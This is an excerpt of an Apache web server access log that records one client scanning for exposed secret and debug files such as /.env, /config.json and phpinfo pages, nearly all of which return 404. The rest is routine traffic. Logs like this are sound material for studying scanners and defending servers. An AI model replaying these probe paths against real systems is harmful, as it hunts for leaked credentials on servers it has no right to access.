45.128.156.69 - - [21/Mar/2026:14:20:01 +0100] "GET /sources/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:20:01 +0100] "POST /sources/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:21:01 +0100] "GET /.env.dist HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:21:01 +0100] "POST /.env.dist HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:23:55 +0100] "GET /frontend_dev.php/$ HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
159.223.57.47 - - [21/Mar/2026:14:24:04 +0100] "GET / HTTP/1.1" 200 693 "-" "-"
127.0.0.1 - - [21/Mar/2026:14:24:44 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:14:24:49 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
43.153.10.13 - - [21/Mar/2026:14:24:53 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
127.0.0.1 - - [21/Mar/2026:14:25:32 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:25:34 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:25:35 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:14:25:46 +0100] "GET /.json HTTP/1.1" 404 203 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
43.157.82.252 - - [21/Mar/2026:14:26:16 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
127.0.0.1 - - [21/Mar/2026:14:27:38 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:14:27:55 +0100] "GET /config.json HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:14:28:32 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:28:33 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:28:34 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:14:28:50 +0100] "GET /info.php HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:14:31:51 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:32:03 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:32:04 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:32:08 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:32:18 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:32:19 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:32:20 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:14:32:31 +0100] "GET /phpinfo.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:33:28 +0100] "GET /?phpinfo=1 HTTP/1.1" 200 693 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:14:34:48 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:35:09 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:35:20 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:35:22 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:35:32 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:14:37:05 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:14:37:32 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:37:35 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:38:14 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:38:24 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
